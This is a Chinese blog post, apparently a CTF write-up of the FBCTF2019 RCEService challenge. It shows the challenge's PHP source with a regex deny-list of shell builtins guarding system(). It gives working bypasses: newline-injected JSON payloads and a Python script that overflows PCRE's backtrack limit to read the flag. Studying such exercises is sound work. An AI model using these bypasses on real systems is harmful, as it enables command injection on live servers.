一天一道ctf 第46天(PCRE回溯次数上限)

最新推荐文章于 2023-06-26 22:33:13 发布
最新推荐文章于 2023-06-26 22:33:13 发布
阅读量817 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/119210408
版权

[FBCTF2019]RCEService
在这里插入图片描述
这道题只允许输入JSON格式,说白了就是键值对形式。可以{"cmd":"ls"}探测到index.php,但是拿不到源码。网上找了一下原题,很多命令都被过滤,只留了一个‘ls’。

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

preg_match只匹配第一行,%0A是换行符,putenv('PATH=/home/rceservice/jail');看到最开头这里设置了环境路径,所以直接cat是不行的,可以先看一下这个路径下有什么。这里要注意直接在URL里构造,在方框里输入会被urlencode通不过。

?cmd={%0A"cmd":"ls /home/rceservice"%0A}

在这里插入图片描述
可以看到flag就在这个文件夹下,cat要用绝对路径

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

在这里插入图片描述
也可以利用PCRE回溯次数的限制绕过,网上都贴的是p神的文章
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
大致原理是preg_match的匹配存在回溯,回溯次数上限是1000000次,超过上限后函数直接返回false。

import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'

res = requests.post("http://challenges.fbctf.com:8085/", data={"cmd":payload})
print(res.text)

在这里插入图片描述

scrawman
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
正则回溯php 绕过,PHP利用PCRE回溯次数绕过某些安全限制 | 码农网
weixin_33268205的博客
03-25 356
这次Code-Breaking Puzzles中我出了一道看似很简单的题目 pcrewaf ,将其代码简化如下:function is_php($data){return preg_match('/].*/is', $data);}if(!is_php($input)) {// fwrite($f, $input); ...}大意是判断一下用户输入的内容有没有 PHP 代码,如果没有,则写入文件。...
php 正则 回溯,preg_match正则最大回溯以及preg_match函数的绕过
weixin_34195649的博客
03-10 1275
先提出一段代码,是i春秋上面的移到ctf题目的代码,也是需要我们绕过的代码:function areyouok($greeting){return preg_match('/Merry.*Christmas/is',$greeting);}$greeting=@$_POST['greeting'];if(!areyouok($greeting)){if(strpos($greeting,'Merr...
利用正则回溯最大次数上限绕过preg_match
yourdawntown的博客
09-29 1315
1. 没有回溯的匹配 假设我们的正则是/ab{1,3}c/,其可视化形式是: 而当目标字符串是"abbbc"时,就没有所谓的“回溯”。其匹配过程是: 其中子表达式b{1,3}表示“b”字符连续出现1到3次。 2. 有回溯的匹配 如果目标字符串是"abbc",中间就有回溯。 图中第5步有红颜色,表示匹配不成功。此时b{1,3}已经匹配到了2个字符“b”,准备尝试第三个时,结果发现接下来的字符是“c”。那么就认为b{1,3}就已经匹配完毕。然后状态又回到之前的状态(即第6步,..
php pcre回溯攻击,PHP利用PCRE回溯次数限制绕过某些安全限制
weixin_32236881的博客
03-29 254
这次 Code-Breaking Puzzles 中我出了一道看似很简单的题目pcrewaf,将其代码简化如下:].*/is',$data);}if(!is_php($input)){//fwrite($f,$input);...}大意是判断一下用户输入的内容有没有 PHP 代码,如果没有,则写入文件。这种时候,如何绕过 is_php() 函数来写入 webshel...
算法题之回溯算法
weixin_42137276的博客
07-23 605
文章目录1、组合总和题目分析回溯剪枝去重复杂度2、全排列&第K个排列题目分析3、子集题目分析4、分割回文串题目分析 1、组合总和 题目 分析 回溯 这题需要使用回溯的方法来解题,对这个所谓回溯算法,我个人的理解是依次尝试,要配合递归,在递归前把数据放入vector,递归结束后再将加入vector的数据取出,然后进行下一次循环。 剪枝 这里还用到了剪枝,即在递归前先判断下当前的数是否还符合条件,如不符合就直接跳过,这样可以省去一些步骤。 去重 还有一个问题就要去重,比如如果candidates中包含
CTF技能树,为初学者的一个认识ctf
10-22
ctf的一个树状图而已
pin-in-CTF:使用intel pin来求解一部分CTF challenge
05-09
pin-in-CTF 使用intel pin来求解一部分CTF challenges
CTF从入门到提升(一).docx
12-18
CTF从入门到提升(一) CTF(Capture The Flag)是一种网络安全竞赛的形式,起源于西方传统运动,两军互相争夺旗帜,夺取敌军旗帜代表战败。在信息安全领域,CTF是通过各种攻击手法,获取服务器后寻找指定的字段,...
一道ctf的misc题
12-18
一道ctf的misc题
CTF——攻防世界第一篇
01-08
下午看了关于ctf的视频,发现自己什么也不懂,明明每个字都是我认识的中文,但是组合到一起就不明白了。「我好难……」 而且,看视频我似乎没什么的耐性,一下午下来还是发现自己没学到什么。所以,今,我决定...
.exp文件_CTF中文件上传及文件包含粗略总结
weixin_39619433的博客
11-22 566
【文件上传】一、前端检查前端对文件后缀进行检查,该种通过抓包修改数据包即可解决二、文件名检查(1)大小写绕过在windows下,可以将后缀写为pHp(2)unicode当目标存在json_decode且检查在json_decode之前,可以将php写为\u0070hp(3)php3457该项为apache专属关键点在/etc/apache2/mods-available/php5.6.c...
[NISACTF 2022]middlerce-----正则匹配回溯绕过
最新发布
qq_73767109的博客
06-26 730
要匹配的第一个字符与字符串中的第一个进行匹配,如果匹配成功就一直匹配下去,直至匹配不成功就到第二个要匹配的字符,如果第二个匹配的字符成功了就一直匹配下去,如果不成功就吐出原匹配好的字符串最右边的一个字符进行匹配,如果还不成功就继续吐,直至匹配成功才到下一个要匹配的字符,但是我们知道,既然前一个匹配的字符成功了就肯定不符合下一个匹配的字符。2.到a这个字符从后面往前回溯匹配,先吐出一个d但匹配不上,继续吐出一个s,sd还是与a匹配不上。这个字符表示可以匹配任意的字符,那么按上面说的匹配机制,
PCRE绕过正则
Aiwin的博客
06-19 941
PCRE绕过正则和例题[NISACTF 2022]middlerce
CTF中文件上传及文件包含总结
None安全团队
12-15 4351
【文件上传】 一、前端检查 前端对文件后缀进行检查,该种通过抓包修改数据包即可解决 二、文件名检查 (1)大小写绕过 在windows下,可以将后缀写为pHp (2)unicode 当目标存在json_decode且检查在json_decode之前,可以将php写为\u0070hp (3)php3457 该项为apache专属 关键点在/etc/apache2/mods-available/php5.6.conf这个文件,满足.+\.ph(p[3457]?|t|tml)$,都会被当.
CTF 每日一题 Day30 还原大师
ChaoYue_miku的博客
01-30 976
题目名称:还原大师 题目类型:Crypto 题目来源:BUUCTF 题目描述:我们得到了一串神秘字符串:TASC?O3RJMV?WDJKX?ZM,问号部分是未知大写字母,为了确定这个神秘字符串,我们通过了其他途径获得了这个字串的32位MD5码。但是我们获得它的32位MD5码也是残缺不全,E903???4DAB???08???51?80??8A?,请猜出神秘字符串的原本模样,并且提交这个字串的32位MD5码作为答案。 注意:得到的 flag 请包上 flag{} 提交 ...
ctfhub-web进阶-shellshock(PHP学习)
qq_62078839的博客
07-09 1335
使用条件:该方法利用的bash中的一个老漏洞,即Bash Shellshock 破壳漏洞(CVE-2014-6271)。该漏洞的原因是Bash使用的环境变量是通过函数名称来调用的,导致该漏洞出现是以开头定义的环境变量在命令 ENV 中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。一般函数体内的代码不会被执行,但破壳漏洞会错误的将”{}”花括号外的命令进行执行。PHP里的某些函数能调用popen或其他能够派生
一道ctf题学习LD_PRELOAD绕过函数禁用
m0_62422842的博客
09-13 1468
前两做了一道ctf题目,遇到比较陌生的知识点,利用LD_PRELOAD环境变量,调用新的进程来加载恶意的so文件,执行我们注入程序中的恶意代码,从而绕过函数限制。当然,这么说也比较抽象,后文会详细说明。
[ctf web][FBCTF2019]RCEService writeup + preg_match()绕过
ShenZ的博客
08-20 2344
[FBCTF2019]RCEService 知识点: preg_match(): 1.%0a换行绕过 2.正则(pcre)最大回溯绕过 putenv()函数 Setting an environment variable preg_match()绕过: 1.正则(pcre)最大回溯/递归限制 2.数组绕过 preg_match只能处理字符串,当传入的subject是数组时会返回false 3.%0a换行绕过 其实是正则书写不当 (1).不会匹配换行符 (2)非多行模式 putenv()函数:
preg_match有字符串长度限制
leafgw的专栏
12-22 1090
preg_match有字符串长度限制 preg_match、preg_match_all都会有这种情况。   解决方法: 方法一、ini_set(‘pcre.backtrack_limit’, 1000000); //默认的只有100000 方法二、修改php.ini 的pcre.backtrack_limit参数,使之支持更大的字符串。加入配置:pcre.backtrack_limit
一道ctf隐写的例题
03-05
以下是一道ctf隐写的例题: 题目描述:给定一张图片,其中隐藏了一段秘密信息。请使用隐写术解密该信息。 解题思路:首先,我们需要使用一些隐写术工具来分析图片,例如Stegsolve、Steghide等。通过分析,我们可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值